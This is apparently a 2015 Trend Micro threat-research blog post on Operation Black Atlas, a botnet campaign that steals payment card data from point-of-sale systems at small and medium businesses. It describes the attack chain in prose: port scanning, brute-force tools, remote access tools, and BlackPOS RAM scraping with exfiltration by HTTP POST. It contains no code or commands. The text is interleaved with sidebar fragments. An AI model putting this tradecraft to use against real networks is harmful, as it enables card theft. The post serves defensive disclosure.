**Go to…** **▼** **[Home » Botnets » Operation Black Atlas Endangers In-Store Card Payments and SMBs Worldwide; Switches](http://blog.trendmicro.com/trendlabs-security-intelligence/)** **Featured Stories** **between BlackPOS and Other Tools** **[2016 Predictions: The Fine Line Between Business](http://blog.trendmicro.com/trendlabs-security-intelligence/2016-predictions-the-fine-line-between-business-and-personal/)** **and Personal** ## Operation Black Atlas Endangers In-Store Card Payments and SMBs Worldwide; Switches between BlackPOS and Other Pawn Storm Targets MH17 Investigation Team Tools FBI, Security Vendors Partner for DRIDEX **Takedown** **[Posted on: December 1, 2015](http://blog.trendmicro.com/trendlabs-security-intelligence/2015/12/)** **at 12:31 am** **[Posted in: Botnets,](http://blog.trendmicro.com/trendlabs-security-intelligence/category/botnets/)** **[Malware](http://blog.trendmicro.com/trendlabs-security-intelligence/category/malware/)** **[Author: Jay Yaneza (Threats Analyst)](http://blog.trendmicro.com/trendlabs-security-intelligence/author/jayyaneza/)** **Japanese Cybercriminals New Addition To** **Underground Arena** **35** **156** **Follow the Data: Dissecting Data Breaches and** **Debunking the Myths** **With the coming holidays also come news of various credit card breaches that endanger the data of** **many industries and their customers. High-profile breaches, such as that of the Hilton Hotel and other** #### Recent Posts **similar establishments, were accomplished using point-of-sale (PoS) malware, leading many to fear** **[digital threats on brick-and-mortar retailers this Thanksgiving, Black Friday, Cyber Monday, and the rest](http://www.darkreading.com/vulnerabilities---threats/black-friday-security-brick-and-mortar-retailers-have-cyber-threats-too/d/d-id/1323235)** **Operation Black Atlas, Part 2: Tools and Malware** **of the holiday season. Researchers also found a broad campaign that uses the modular ModPOS** **Used and How to Detect Them** **malware to steal payment card data from retailers in the US.** **[New Targeted Attack Group Buys BIFROSE Code,](http://blog.trendmicro.com/trendlabs-security-intelligence/new-targeted-attack-group-buys-bifrose-code-works-in-teams/)** **Works in Teams** **However, from what we have seen, it is not only retailers in the US that are at risk of breaches. Our** **researchers recently found an early version of a potentially powerful, adaptable, and invisible botnet** **[Adobe Flash Player Fixes 79 Bugs; Microsoft Issues](http://blog.trendmicro.com/trendlabs-security-intelligence/adobe-flash-player-fixes-79-bugs-microsoft-issues-12-patches-in-december-patch-tuesday/)** **that seeks out PoS systems within networks. It has already extended its reach to small and medium** **12 Patches in December Patch Tuesday** **sized business networks all over the world, including a healthcare organization in the US. We are** **calling this operation Black Atlas, in reference to BlackPOS, the malware primarily used in this** **Blog of News Site “The Independent” Hacked,** **Leads to TeslaCrypt Ransomware** **operation.** **[The German Underground: Buying and Selling](http://blog.trendmicro.com/trendlabs-security-intelligence/the-german-underground-buying-and-selling-goods-via-droppers/)** **Operation Black Atlas has been around since September 2015, just in time to plant its seeds before the** **Goods via Droppers** **holiday season. Its targets include businesses in the healthcare, retail, and more industries which rely** **on card payment systems.** #### 2016 Security Predictions **The operation is run by technically sophisticated cybercriminals who are knowledgeable in a variety of** **penetration testing tools and possess a wide network of connections to PoS malware in the** **underground market. Its operators built a set of tools much like a Swiss army knife, with each tool** **offering a different functionality. Malware utilized in Black Atlas included (but were not limited to)** **[variants of Alina, NewPOSThings, a Kronos backdoor, and BlackPOS. BlackPOS, also known as](http://blog.trendmicro.com/trendlabs-security-intelligence/two-new-pos-malware-affecting-us-smbs/)** **[Kaptoxa, was the malware used during the Target breach in 2013 and attacks on retail accounts in](http://money.cnn.com/2014/02/11/news/companies/retail-breach-timeline/)** **2014.** **From new extortion schemes and IoT** **[Similar to GamaPoS, the Black Atlas operators employed a “shotgun” approach to infiltrate networks as](http://blog.trendmicro.com/trendlabs-security-intelligence/new-gamapos-threat-spreads-in-the-us-via-andromeda-botnet/)** **threats to improved cybercrime** **legislation, Trend Micro predicts how the** **opposed to zeroing in on specific targets. They basically checked available ports on the Internet to see** **security landscape is going to look like in** **if they can get in, ending up with multiple targets around the world. The following graph shows where** **2016.** **these targets are located:** **[Read more](http://www.trendmicro.com/vinfo/us/security/research-and-analysis/predictions/2016)** #### Popular Posts **[Blog of News Site “The Independent” Hacked,](http://blog.trendmicro.com/trendlabs-security-intelligence/blog-of-news-site-the-independent-hacked-leads-to-teslacrypto-ransomware/)** **Leads to TeslaCrypt Ransomware** **[High-Profile Mobile Apps At Risk Due to Three-Year-](http://blog.trendmicro.com/trendlabs-security-intelligence/high-profile-mobile-apps-at-risk-due-to-three-year-old-vulnerability/)** **Old Vulnerability** **[Trend Micro, NCA Partnership Leads to Arrests and](http://blog.trendmicro.com/trendlabs-security-intelligence/trend-micro-nca-partnership-lead-to-arrests-and-shutdown-of-refud-me-and-cryptex-reborn/)** **Shutdown of Refud.me and Cryptex Reborn** **Cybercriminals Improve Android Malware Stealth** **Routines with OBAD** **[Hacking Team Flash Zero-Day Integrated Into](http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-flash-zero-day-integrated-into-exploit-kits/)** **Exploit Kits** #### Latest Tweets **#PoS systems can be attacked with #PoS** **[skimmers: bit.ly/1NVgYcR](https://t.co/UpRbY6eXph)** ----- **[bit.ly/1QrUzX6](https://t.co/t6BQIC2FeT)** **It's tricky for Law enforcement to keep up** **with North American cybercriminals’ erratic** **[bit.ly/1YNuO4t #DeepWeb](https://t.co/ldur39zSdA)** **Email Subscription** **Your email here** # bb **[creative: bit.ly/1QrUzX6](https://t.co/t6BQIC2FeT)** **live video feed of closed-circuit television (CCTV) cameras in a gasoline station. Either this is taking** **reconnaissance to another real-time level or the cybercriminals simply captured whatever information is** **available.** **How Operation Black Atlas Works** **Our analysis of the attacks against these targets gave us further insights on how the Black Atlas** **operators seek out PoS systems from networks. In one particular case, which involved a healthcare** **[about 5 hours ago](http://twitter.com/TrendLabs/status/679043669320720385)** **organization in the US, we found out how the Black Atlas operators operate.** **[Similar to a targeted attack, Black Atlas involves an intelligence gathering or reconnaissance period](http://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/targeted-attacks-six-components)** **It's tricky for Law enforcement to keep up** **with North American cybercriminals’ erratic** **where cybercriminals use a set of tools similar to a Swiss army knife to check how best to infiltrate** **[nature: bit.ly/1YNuO4t #DeepWeb](https://t.co/ldur39zSdA)** **systems. It also involves the use of tools such as brute force or dictionary attack tools, SMTP scanners,** **[about 10 hours ago](http://twitter.com/TrendLabs/status/678968171680940033)** **and remote desktop viewers. Networks with weak password practices are likely to fall victim to this** **initial penetration testing stage. Many of these tools are easily downloaded from various sites on the** **Internet.** **Stay Updated** **Email Subscription** **Your email here** **_Figure 2. Operation Black Atlas infection chain_** **The cybercriminals will then create a test plan based on the initial probe, and then use a second set of** **tools to execute the said plan. In the case of the healthcare organization, the Black Atlas operators** **utilized remote access tools to steal more information and move laterally within the network. The use of** **remote access tools at this stage depends on how the target environment is configured, with the** **method of gaining remote access also varying based on the target.** **Once inside, cybercriminals then familiarize themselves with the environment. What follows is the** **introduction of PoS threats, which the cybercriminals source from the operation’s broad Swiss army** **knife toolbox.The favored way to introduce other tools and threats is via the built-in command-line FTP** **since antimalware solutions had already blocked the initial site we had reported last September that** **[hosted Katrina and CenterPoS.](http://blog.trendmicro.com/trendlabs-security-intelligence/two-new-pos-malware-affecting-us-smbs/)** **Black Atlas operators used the modular botnet Gorynych or Diamond Fox in some installations.** **Gorynich was used to download a repurposed BlackPOS malware with RAM scraping functionality and** **upload all the dumped credit card numbers in memory. As the original BlackPOS used a text file to store** **pilfered credit card data, Gorynych now grabs that text file and does an HTTP POST to complete the** **data exfiltration:** **_Figure 3. Gorynych data exfiltration stage_** **In our next blog entry, we will discuss the steps of our investigation, how cybercriminals retrofitted the** **new Gorynych backdoor to use BlackPOS, and how the whole operation puts a variety of old and new** **PoS malware at the cybercriminals’ fingertips to easily gather financial information. We will also provide** **technical details, best practices, and recommendations to help IT managers and business owners** **evade or resolve this PoS threat.** **_With additional analysis by Erika Mendoza_** ----- ### Related Posts: **[Operation Black Atlas, Part 2: Tools and Malware Used and How to Detect Them](http://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-part-2-tools-and-malware-used-and-how-to-detect-them/)** **[One-Man PoS Malware Operation Captures 22,000 Credit Card Details in Brazil](http://blog.trendmicro.com/trendlabs-security-intelligence/fighterpos-fighting-a-new-pos-malware-family/)** **[Two New PoS Malware Affecting US SMBs](http://blog.trendmicro.com/trendlabs-security-intelligence/two-new-pos-malware-affecting-us-smbs/)** **[Credit Card-Scraping Kasidet Builder Leads to Spike in Detections](http://blog.trendmicro.com/trendlabs-security-intelligence/credit-card-scraping-kasidet-builder-leads-to-spike-in-detections/)** **Tags:** **[Botnets](http://blog.trendmicro.com/trendlabs-security-intelligence/tag/botnets/)** **[SMB](http://blog.trendmicro.com/trendlabs-security-intelligence/tag/smb/)** **[healthcare](http://blog.trendmicro.com/trendlabs-security-intelligence/tag/healthcare/)** **[POS](http://blog.trendmicro.com/trendlabs-security-intelligence/tag/pos/)** **[point-of-sale](http://blog.trendmicro.com/trendlabs-security-intelligence/tag/point-of-sale/)** **Comments for this thread are now closed.** #### 0 Comments TrendLabs 1 Login **Recommend** **Share** **Sort by Best** **ALSO ON TRENDLABS** #### Trend Micro, NCA Partnership Leads to Targeted Attacks versus APTs: What’s Arrests and Shutdown of Refud.me … The Difference?� **16 comments •** **a month ago** **3 comments •** **3 months ago** **LegitBytes — This is a bunch of Bullshit,** **TrendLabs — Whether or not the Sony** **worry about Zeus, Betabot and other** **attack was an APT is still up for debate. As** **Banking Trojans rather than fucking …** **I explained in the entry, APTs are known …** #### Blog of News Site “The Independent” Latest Flash Exploit Used in Pawn Storm Hacked, Leads to TeslaCrypt … Circumvents Mitigation Techniques … **3 comments •** **13 days ago** **2 comments •** **2 months ago** **Jérôme Segura — You're welcome. I** **TrendLabs — Yes, EMET 5.x can be** **sincerely hope the 'bad ad' they report is** **bypassed. Note though that not every** **not a way to divert attention and blame …** **exploit will be implemented to bypass …** **Subscribe** **Add Disqus to your site** **�** **Privacy** **[HOME AND HOME OFFICE](http://www.trendmicro.com/us/home/index.html)** **|** **[FOR BUSINESS](http://www.trendmicro.com/us/business/index.html)** **|** **[SECURITY INTELLIGENCE](http://www.trendmicro.com/us/security-intelligence/index.html)** **|** **[ABOUT TREND MICRO](http://www.trendmicro.com/us/about-us/index.html)** **[Asia Pacific Region (APAC): Australia / New Zealand, 中国, ⽇本, 대한민국](http://www.trendmicro.com.au/au/home/index.html)** **[, 台灣](http://tw.trendmicro.com/tw/home/index.html)** **[Latin America Region (LAR): Brasil, México](http://br.trendmicro.com/br/home/index.html)** **[North America Region (NABU): United States, Canada](http://www.trendmicro.com/us/index.html)** **[Europe, Middle East, & Africa Region (EMEA): France, Deutschland / Österreich / Schweiz, Italia, Россия, España, United Kingdom / Ireland](http://www.trendmicro.fr/)** **[Privacy Statement](http://www.trendmicro.com/us/about-us/legal-policies/privacy-statement/index.html)** **[Legal Policies](http://www.trendmicro.com/us/about-us/legal-policies/index.html)** **Copyright © 2015 Trend Micro Incorporated. All rights reserved.** ----- -----